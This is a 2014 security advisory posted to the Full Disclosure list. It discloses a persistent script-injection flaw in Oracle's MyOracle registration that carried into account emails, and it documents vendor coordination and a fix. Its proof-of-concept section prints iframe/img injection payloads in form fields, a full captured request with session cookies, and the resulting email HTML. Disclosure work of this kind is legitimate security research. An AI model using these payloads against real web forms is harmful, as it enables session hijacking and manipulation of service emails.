[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Oracle Corporation MyOracle - Persistent Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-09-26 11:16:22
Message-ID: 54254B06.5080509 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261
Oracle Security ID (Team Tracking ID): admin@vulnerability-lab.com-001
Release Date:
=============
2014-09-17
Vulnerability Laboratory ID (VL-ID):
====================================
1261
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered \
in Redwood City, California, United States. The company specializes in developing and \
marketing computer hardware systems and enterprise software products – particularly its own \
brands of database management systems. Oracle is the second-largest software maker by revenue, \
after Microsoft. The company also builds tools for database development and systems of \
middle-tier software, enterprise resource planning (ERP) software, customer relationship \
management (CRM) software and supply chain management (SCM) software. Larry Ellison, a \
co-founder of Oracle, has served as Oracle`s CEO throughout its history. He also served as the \
Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, \
the Associated Press ranked Ellison as the top-paid chief executive in the world.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the \
official Oracle Corporation `MyOracle` service web-application.
Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU \
Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has been discovered in \
the official Oracle Corporation `MyOracle` service web-application. The vulnerability allows to \
bypass the regular web/system validation to inject own script codes in outgoing emails of the \
account system mail server service.
The vulnerability is located in the name values of the my-oracle `registration` module. Remote \
attackers are able to inject in the first and lastname input fields of the registration \
formular own script codes via POST method request. The injected script code activates the \
account mail service notification which returns with the persistent code in the myoracle token \
activation site. The issue impact a critical risk because an attacker is able to inject own \
tokens or can manipulate the full mail body context. Further send notification mails by the \
myoracle service can also be affected by the issue. The encoding of the server does not \
recognize outgoing service mails which results in the persistent issue in outgoing emails. The \
injection point is a profile values update or directly the remote registration itself. The \
security risk of the persistent mail encoding and filter web vulnerability is estimated as \
medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the vulnerability requires low user interaction and no privileged application \
user account. Successful exploitation results in persistent session hijacking attacks, \
unauthorized external redirects to malicious sources and persistent manipulation of affected or \
connected module context.
Request Method(s):
[+] POST
Vulnerable Service(s):
[+] MyOracle
Vulnerable Module(s):
[+] Registration (exp.)
Vulnerable Parameter(s):
[+] Profile name values (firstname & lastname ...)
[Sender]:
[+] oracle-acct_ww@oracle.com
[Receiver]:
[+] admin@evolution-sec.com & bkm@evolution-sec.com
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low \
user interaction and without privileged application user account. For security demonstration or \
to reproduce the persistent mail encoding web vulnerability follow the provided information and \
steps below to continue.
Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com
Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com
Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3
Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.o \
racle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~67 \
5513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52 \
B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16 \
A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D \
351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBC \
B4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C \
6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.o \
racle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~67 \
5513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52 \
B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16 \
A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D \
351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBC \
B4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C \
6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0
-- PoC Session Logs [POST] ---
20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flo \
gin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656B \
F073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F \
007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C0 \
71F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BB \
C8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF \
6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03 \
094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0 \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[720] Mime \
Type[text/html] Request Header:
Host[myprofile.oracle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3 \
A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1 \
.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B \
8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B3 \
41AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC282595 \
1B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569D \
AEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400 \
A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; \
optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; \
s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; \
gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextU \
RL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login \
%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2B \
D867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944E \
A97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3 \
D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA417895 \
48D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12 \
025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC \
9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0; \
s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%25 \
3Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; \
p_org_id=1001; p_lang=US; \
p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; \
atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%25 \
3B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520 \
University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_i \
d%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%2 \
57C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%2 \
53A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; \
JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; \
BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; \
notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; \
s_eVar21=CLD-hp-panel-build-business-intelligence] Connection[keep-alive]
POST-Daten:
ops[Bitte+w%C3%A4hlen+Sie+...]
drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
err[FEHLER]
reqd[Erforderliches+Feld.]
lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
unamefield[admin%40evolution-sec.com]
passwd1[Keymaster148%21]
passwd2[Keymaster148%21]
givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
usr_jtitle[pentester]
usr_ctry[41]
usr_state[6]
usr_cty[Kassel]
companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
usr_line1[bremerstrasse+1337]
usr_line2[]
usr_postal_code[34125]
telephonenumber[573246234]
usr_srv_otn[t]
usr_srv_cio[t]
usr_nsl_psn[t]
org.apache.myfaces.trinidad.faces.FORM[f1]
_noJavaScript[false]
javax.faces.ViewState[%2118erzf7qoc]
event[]
source[cb1]
partial[]
Response Header:
Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https% \
3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv \
1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806 \
B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B \
341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC28259 \
51B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569 \
DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B268740 \
0A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
X-Frame-Options[sameorigin]
Content-Type[text/html]
Content-Language[en]
Content-Encoding[gzip]
Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 \
(N;ecid=122956956898568077,0)] Content-Length[720]
Vary[Accept-Encoding]
Date[Fri, 25 Apr 2014 18:16:45 GMT]
Connection[keep-alive]
PoC: Exploitcode in Mail
<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" \
width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle \
Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: \
</b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" \
cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: \
</b>admin@evolution-sec.com</td></tr></tbody></table><br> <meta http-equiv="Content-Type" \
content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" \
width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; \
border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; \
background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" \
width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" \
target="_blank"><img \
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif" \
alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td \
style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; \
color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img \
src="x">,<br><br>Bitte klicken Sie zum Bestà ¤tigen Ihres Accounts auf den folgenden Link. Der \
Link ist 5 Tage lang gà ¼ltig.<br><br><a \
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C21 \
86C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><font \
color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: \
admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer \
Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung \
erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte \
der obige Link nicht funktionieren kà ¶nnen Sie zur Verifizierung Ihrer Emailadresse auch die \
folgende URL kopieren und in Ihren Browser einfà \
¼gen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D \
4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie \
wollen eine weitere Bestà ¤tigungsemail generieren?</b><br>1) <a \
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" \
target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) \
Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". \
<br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; \
height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre \
Nutzung der Oracle Websites und Services der <a \
href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font \
color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a \
href="http://www.oracle.com/us/legal/index.html" target="_blank"><font \
color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres \
Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit \
wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein kà ¶nnen. Melden Sie \
sich dafà ¼r zunà ¤chst an und klicken Sie dann auf den Link "Benutzernamen à ¤ndern" auf \
Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen fà ¼r Ihre \
Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der \
Kommunikationseinstellungen fà ¼r Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese \
Email erhalten, da vor kurzem fà ¼r diese Emailadresse ein Benutzerkonto auf der Oracle \
Website erstellt wurde. Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website \
erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font \
color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder \
Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" \
target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td \
style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a \
href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img \
src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif" \
alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" \
/></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td \
height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" \
color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" \
style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> \
<a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font \
color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a \
href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" \
face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und \
Nutzungsbedingungen</u></font></a> | <a \
href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" \
size="1" face="Arial, Helvetica, \
sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>
Script Code Payload:
> <iframe src="http://www.vulnerability-lab.com">%20"><img \
> src="http://evolution-sec.com/sites/default/files/65-2_0.png">
Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken
Picture(s):
../1.png
../2.png
../3.png
Resource(s):
../Account verifizieren.htm
../Bitte verifizieren Sie Ihren Oracle Account.html
../Bitte verifizieren Sie Ihren Oracle Account_poc.html
../poc.txt
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable first- and \
last-name input fields in the myoracle application. Encode stored data of user in the dbms when \
processing to send service notifications by the mail info@oracle email to prevent persistent \
injection attacks.
Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account \
system web-server is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic